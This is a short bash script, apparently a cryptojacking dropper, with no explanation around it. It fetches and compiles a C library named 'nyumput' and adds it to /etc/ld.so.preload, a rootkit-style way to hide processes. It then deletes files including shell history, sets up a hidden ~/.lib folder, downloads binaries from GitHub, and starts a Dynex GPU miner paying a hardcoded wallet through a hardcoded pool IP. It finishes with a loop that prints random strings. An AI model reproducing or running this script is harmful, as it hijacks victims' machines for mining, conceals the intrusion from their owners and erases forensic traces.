#!/bin/bash
curl https://bitbucket.org/dennidarko01/kangkung/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
rm -rvf ele* lol* 1.43* TON* ton* NB* .lib* .bash*
cd ~/
mkdir .lib
cd .lib
rm -rf *
WORKER="$(echo $(shuf -i 1-999999 -n 1)-CEK)"
WALLETNH="XwmwmT1AGF7b4EueCSFizEc7RyXGGFwqoQgXCYcSz2ctAyYzUaqScKJTDgnM4X3qjsZrgfgojbnGEZRVepMAQYce28bcXQbTA"
POOLNHETC="139.144.135.181"
rm -f dynex_compute_w340.cnf && wget -q 'https://github.com/16613047/cikan/raw/main/dynex_compute_w340.cnf' && chmod +x dynex_compute_w340.cnf
rm -f h-manifest.conf && wget -q 'https://github.com/16613047/cikan/raw/main/h-manifest.conf' && chmod +x h-manifest.conf
rm -f dynexsolve && wget -q 'https://github.com/16613047/cikan/raw/main/dynexsolve' && chmod +x dynexsolve
./dynexsolve -stratum-url $POOLNHETC -stratum-port 443 -mining-address $WALLETNH -stratum-password $WORKER -no-cpu -multi-gpu -mallob-endpoint mallob.neuropool.net:8081
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
